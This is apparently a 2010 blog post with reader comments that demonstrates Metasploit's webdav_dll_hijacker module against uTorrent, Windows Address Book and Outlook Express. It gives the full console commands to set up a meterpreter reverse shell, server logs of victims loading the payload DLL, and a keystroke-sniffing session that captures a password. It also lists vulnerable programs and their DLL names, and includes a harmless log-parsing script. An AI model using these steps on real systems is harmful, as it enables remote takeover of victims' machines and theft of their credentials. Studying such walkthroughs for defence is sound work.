So, for those of you who do not follow the Metasploit project as closely as others, there was a new module included in the 10125 revision which came out on Monday. This module is kind of a huge deal, because it affects many, many Windows programs. I’ll demonstrate one in this post, but if you follow HD Moore’s article describing the flaws and how to detect them, he includes a few scripts to be able to test programs individually, which will help you discover new (and possibly unknown) affected software.

Anyway, here is a link to his blog post detailing parts of the process.

If you follow the Exploit-DB feed, you’ll notice that there’s a deluge of DLL hijacking exploits being released. Essentially, the people releasing these are simply using the scripts HD Moore provided to detect the new vulnerabilities and then releasing the details. But, with the sheer amount of exploits being released, it should give you some idea as to the seriousness of this issue and the impact that it has.

To demonstrate…

…I’m going to target uTorrent, which is undoubtedly the best Torrent client for Windows. Here is a link to the Exploit-DB post giving the details of the vulnerability.

# msfconsole

msf > use windows/browser/webdav_dll_hijacker
msf exploit(webdav_dll_hijacker) > show options

Module options:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   BASENAME    policy           yes       The base name for the listed files.
   EXTENSIONS  txt              yes       The list of extensions to generate
   SHARENAME   documents        yes       The name of the top-level share.
   SRVHOST     0.0.0.0          yes       The local host to listen on.
   SRVPORT     80               yes       The daemon port to listen on (do not change)
   URIPATH     /                yes       The URI to use (do not change).

Exploit target:

   Id  Name
   --  ----
   0   Automatic

So, here we have the module “webdav_dll_hijacker” and its available options. We know from the Exploit-DB post that the filename needs to have a .torrent (or .btsearch) extension.

msf exploit(webdav_dll_hijacker) > set basename owned
basename => owned
msf exploit(webdav_dll_hijacker) > set extensions "torrent"
extensions => .torrent
msf exploit(webdav_dll_hijacker) > set sharename hacku
sharename => hacku
msf exploit(webdav_dll_hijacker) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(webdav_dll_hijacker) > set lport 31337
lport => 31337
msf exploit(webdav_dll_hijacker) > set lhost 1.2.3.4
lhost => 10.0.0.58
msf exploit(webdav_dll_hijacker) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 1.2.3.4:31337
[*]
[*] Exploit links are now available at \\1.2.3.4\hacku\
[*]
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://1.2.3.4:80/
[*] Server started.

Now, on the victim machine, which is a Windows XP SP2 box, we browse over to \\1.2.3.4\hacku. As far as I know, this hijacking method works on all versions of Windows currently. I have not tried it on anything but XP, though. So I’d like to hear what you discover.

Once the victim has accessed the share, a bunch of information will be displayed in the MSF console. The important information comes when the victim clicks on the only file in the directory. A single click will do the job:

[*] 10.0.0.252:1195 PROPFIND /hacku/owned..torrent
[*] 10.0.0.252:1195 PROPFIND => 207 File (/hacku/owned..torrent)
[*] 10.0.0.252:1195 PROPFIND /hacku/plugin_dll.dll
[*] 10.0.0.252:1195 PROPFIND => 207 File (/hacku/plugin_dll.dll)
[*] 10.0.0.252:1195 GET => DLL Payload
[*] 10.0.0.252:1196 PROPFIND /HACKU
[*] 10.0.0.252:1196 PROPFIND => 301 (/HACKU)
[*] 10.0.0.252:1195 PROPFIND /hacku/rundll32.exe
[*] 10.0.0.252:1195 PROPFIND => 404 (/hacku/rundll32.exe)
[*] 10.0.0.252:1196 PROPFIND /HACKU/
[*] Sending stage (748544 bytes) to 10.0.0.252
[*] 10.0.0.252:1196 PROPFIND => 207 Directory (/HACKU/)
[*] 10.0.0.252:1196 PROPFIND => 207 Top-Level Directory
[*] 10.0.0.252:1195 PROPFIND /hacku/rsaenh.dll
[*] 10.0.0.252:1195 PROPFIND => 207 File (/hacku/rsaenh.dll)
[*] 10.0.0.252:1196 PROPFIND /HACKU
[*] 10.0.0.252:1196 PROPFIND => 301 (/HACKU)
[*] 10.0.0.252:1195 GET => DLL Payload
[*] 10.0.0.252:1196 PROPFIND /HACKU/
[*] 10.0.0.252:1196 PROPFIND => 207 Directory (/HACKU/)
[*] 10.0.0.252:1196 PROPFIND => 207 Top-Level Directory
[*] 10.0.0.252:1195 PROPFIND /HACKU
[*] 10.0.0.252:1195 PROPFIND => 301 (/HACKU)
[*] 10.0.0.252:1196 PROPFIND /HACKU/
[*] 10.0.0.252:1196 PROPFIND => 207 Directory (/HACKU/)
[*] 10.0.0.252:1196 PROPFIND => 207 Top-Level Directory
[*] 10.0.0.252:1195 GET => REDIRECT (/hacku/owned..torrent)
[*] Meterpreter session 1 opened (1.2.3.4:31337 -> 10.0.0.252:1197) at Tue Aug 24 12:40:12 -0500 2010
[*] 10.0.0.252:1196 PROPFIND /hacku
[*] 10.0.0.252:1196 PROPFIND => 301 (/hacku)
[*] 10.0.0.252:1195 PROPFIND /hacku/
[*] 10.0.0.252:1195 PROPFIND => 207 Directory (/hacku/)
[*] 10.0.0.252:1196 PROPFIND /hacku/desktop.ini
[*] 10.0.0.252:1196 PROPFIND => 404 (/hacku/desktop.ini)

You’ll notice that the 3rd line makes reference to a file named “plugin_dll.dll”. Metasploit automagically determined that uTorrent was looking for “plugin_dll.dll” and offered it up.
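To pull that same fact out of the console output without reading it by hand, here is a small parser, added for this post and not part of Metasploit or the original write-up, that walks the request lines above (plus the Update 3 Address Book lines) and reports, per client, which document was opened from the share, which DLL names the application went looking for next to it, and which of those the server actually delivered. The sample log is constructed from the lines shown in this post; the regexes assume the module's log format exactly as printed here.

```python
import re

# Constructed sample: request lines taken from this post's msfconsole output for the
# uTorrent (.torrent) case and the Update 3 Windows Address Book (.vcf) case.
SAMPLE_LOG = """\
[*] 10.0.0.252:1195 PROPFIND /hacku/owned..torrent
[*] 10.0.0.252:1195 PROPFIND /hacku/plugin_dll.dll
[*] 10.0.0.252:1195 PROPFIND => 207 File (/hacku/plugin_dll.dll)
[*] 10.0.0.252:1195 GET => DLL Payload
[*] 10.0.0.252:1195 PROPFIND /hacku/rundll32.exe
[*] 10.0.0.252:1195 PROPFIND => 404 (/hacku/rundll32.exe)
[*] 10.0.0.252:1195 PROPFIND /hacku/rsaenh.dll
[*] 10.0.0.252:1195 GET => DLL Payload
[*] 10.0.0.252:1195 GET => REDIRECT (/hacku/owned..torrent)
[*] 10.0.0.252:1137 PROPFIND /hacku/wab32res.dll
[*] 10.0.0.252:1133 GET => DLL Payload
[*] 10.0.0.252:1133 GET => DATA (/hacku/owned.vcf)
"""

# A request line that names a path: a WebDAV PROPFIND, or the document itself being fetched.
PATH_LINE = re.compile(
    r"^\[\*\] (?P<ip>\d+(?:\.\d+){3}):\d+ "
    r"(?:PROPFIND (?P<probe>/\S*)|GET => (?:DATA|REDIRECT) \((?P<doc>/\S*)\))$")
# The module handing a payload DLL to the client; this line does not repeat the name.
DLL_SERVED = re.compile(r"^\[\*\] (?P<ip>\d+(?:\.\d+){3}):\d+ GET => DLL Payload$")
# Probes for things that are not loadable DLLs (rundll32 lookups, config files, resources).
NOT_A_DLL = (".exe", ".ini", ".inf", ".mui")

def analyse(log):
    """Per client IP: documents opened from the share, DLL names the application
    searched for next to that document, and the names the server actually delivered."""
    report, last_dll = {}, {}
    for line in log.splitlines():
        m = PATH_LINE.match(line)
        if m:
            ip = m.group("ip")
            name = (m.group("probe") or m.group("doc")).rsplit("/", 1)[-1].lower()
            entry = report.setdefault(ip, {"documents": set(), "dlls_probed": set(), "dlls_served": set()})
            if name.endswith(".dll"):
                entry["dlls_probed"].add(name)
                last_dll[ip] = name          # the next "DLL Payload" line is for this name
            elif "." in name and not name.endswith(NOT_A_DLL):
                entry["documents"].add(name)
            continue
        m = DLL_SERVED.match(line)
        if m and m.group("ip") in last_dll:
            report[m.group("ip")]["dlls_served"].add(last_dll[m.group("ip")])
    return {ip: {k: sorted(v) for k, v in e.items()} for ip, e in report.items()}
```

Calling analyse(SAMPLE_LOG) gives one entry for 10.0.0.252 listing owned..torrent and owned.vcf as the documents and plugin_dll.dll, rsaenh.dll and wab32res.dll as both probed and served; a name that shows up under dlls_probed but not dlls_served is an application that looked in the share but did not load from it.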

Active sessions
===============

  Id  Type         Information                     Connection
  --  ----         -----------                     ----------
  1   meterpreter  VICTIM\Administrator @ VICTIM   1.2.3.4:31337 -> 10.0.0.252:1197

msf exploit(webdav_dll_hijacker) > sessions -i 1
[*] Starting interaction with 1…

meterpreter > getuid
Server username: VICTIM\Administrator

meterpreter > keyscan_start
Starting the keystroke sniffer…

meterpreter > keyscan_dump
Dumping captured keystrokes…
my password is 1234567

meterpreter >

…and so on and so forth.

Once again, Metasploit makes this entire process really simple. I’m picking on uTorrent here because it was the first on the list in my reader, but there is a ton of other software that is vulnerable to this attack.

Update:

I figured I’d include a list of the already known pieces of software that are vulnerable to this (taken from Exploit-DB):

Windows Live Email DLL Hijacking Exploit (dwmapi.dll)
Microsoft Power Point 2010 DLL Hijacking Exploit (pptimpconv.dll)
Wireshark <= 1.2.10 DLL Hijacking Exploit (airpcap.dll)
uTorrent <= 2.0.3 DLL Hijacking Exploit (plugin_dll.dll)
* Outlook Express 6 (6.00.2900.2180) (mapi32x.dll)
* Windows Address Book (wab32res.dll)
Find a continually growing list here

If you come across any, please post them in the comments and I’ll update the post to include them.

Update 2:

I just came across a really well written article from SANS that goes into the details behind this attack. Check it out.

Update 3:

I just discovered one that I haven’t seen yet that is a bit more universal than most of the others that I’ve come across. Windows Address Book when opening .vcf files requests “wab32res.dll” and is vulnerable to hijacking.

[*] 10.0.0.252:1137 PROPFIND /hacku
[*] 10.0.0.252:1137 PROPFIND => 301 (/hacku)
[*] 10.0.0.252:1133 PROPFIND /hacku/
[*] 10.0.0.252:1133 PROPFIND => 207 Directory (/hacku/)
[*] 10.0.0.252:1133 PROPFIND => 207 Top-Level Directory
[*] 10.0.0.252:1137 PROPFIND /hacku/wab32res.dll
[*] 10.0.0.252:1137 PROPFIND => 207 File (/hacku/wab32res.dll)
[*] 10.0.0.252:1133 GET => DLL Payload
[*] 10.0.0.252:1137 PROPFIND /hacku/rundll32.exe
[*] 10.0.0.252:1137 PROPFIND => 404 (/hacku/rundll32.exe)
[*] 10.0.0.252:1133 GET => DATA (/hacku/owned.vcf)
[*] Sending stage (748544 bytes) to 10.0.0.252
[*] Meterpreter session 4 opened (1.2.3.4:31337 -> 10.0.0.252:1155) at Tue Aug 24 13:49:02 -0500 2010

Update 4:

I just found yet another. Outlook Express, when opening .eml files, requests quite a few different DLLs; it appears to be “mapi32x.dll” that is the vulnerable one, however.

[*] 10.0.0.252:1196 PROPFIND /hacku/"%ProgramFiles%/Internet Explorer/Connection Wizard"/ICWCONN1.EXE
[*] 10.0.0.252:1196 PROPFIND => 404 (/hacku/"%ProgramFiles%/Internet Explorer/Connection Wizard"/ICWCONN1.EXE)
[*] 10.0.0.252:1196 PROPFIND /hacku/mapisvc.inf
[*] 10.0.0.252:1196 PROPFIND => 207 File (/hacku/mapisvc.inf)
[*] 10.0.0.252:1196 PROPFIND /hacku/mapi32x.dll
[*] 10.0.0.252:1196 PROPFIND => 207 File (/hacku/mapi32x.dll)
[*] 10.0.0.252:1196 GET => DLL Payload
[*] 10.0.0.252:1196 PROPFIND /hacku/rundll32.exe
[*] 10.0.0.252:1196 PROPFIND => 404 (/hacku/rundll32.exe)
[*] Sending stage (748544 bytes) to 10.0.0.252
[*] 10.0.0.252:1196 PROPFIND /hacku/ieframe.dll
[*] 10.0.0.252:1196 PROPFIND => 207 File (/hacku/ieframe.dll)
[*] 10.0.0.252:1196 PROPFIND /hacku/en-US/ieframe.dll.mui
[*] 10.0.0.252:1196 PROPFIND => 207 File (/hacku/en-US/ieframe.dll.mui)
[*] 10.0.0.252:1196 GET => DATA (/hacku/en-US/ieframe.dll.mui)
[*] 10.0.0.252:1196 PROPFIND /hacku/en/ieframe.dll.mui
[*] 10.0.0.252:1196 PROPFIND => 207 File (/hacku/en/ieframe.dll.mui)
[*] 10.0.0.252:1196 GET => DATA (/hacku/en/ieframe.dll.mui)
[*] 10.0.0.252:1196 PROPFIND /hacku/ieframe.dll.mui
[*] 10.0.0.252:1196 PROPFIND => 207 File (/hacku/ieframe.dll.mui)
[*] 10.0.0.252:1196 GET => DATA (/hacku/ieframe.dll.mui)
[*] 10.0.0.252:1196 PROPFIND /hacku/rsaenh.dll
[*] 10.0.0.252:1196 PROPFIND => 207 File (/hacku/rsaenh.dll)
[*] 10.0.0.252:1196 GET => DLL Payload
[*] Meterpreter session 5 opened (1.2.3.4:31337 -> 10.0.0.252:1197) at Tue Aug 24 14:04:45 -0500 2010

  1. exceed says:

    You may add this to your list…

    - program: Office 2007
    - app: Word / format: docx / module: rpawinet.dll
    - app: Excel / format: xlsx / module: rpawinet.dll

  2. exceed says:

    Oops, there’s a bug in previous post. It’s *not* Excel but *Powerpoint* and the format is not .xlsx but .pptx. Sorry for the mess.

  3. Matt says:

    @exceed: I did see PowerPoint mentioned somewhere already.. but I hadn’t seen Word yet. Thanks!!

  4. [...] big “zero-day” exploit this week was the malicious Windows DLL payload brought to the spotlight by Rapid7’s HD Moore. Two other researchers appear to have [...]

  5. nobody says:

    Hi,

    You are referring to “Microsoft Power Point 2010 DLL Hijacking Exploit (pptimpconv.dll)”. Did you try it? Did it work? It didn’t work for me. I’ve checked PowerPoint and other Office 2010 apps with Process Monitor and couldn’t find any DLL hijacking vulnerabilities.

  6. Matt says:

    @nobody: I actually don’t have PowerPoint, but I have seen a few articles indicating that it’s vulnerable. I’ll see if I can recreate it myself and post an update.

  7. proc says:

    @exceed,
    did you check Office/Word 2007? Did you try it? Does it work?
    I cannot get it working. I’ve checked the way described and by the process monitor.
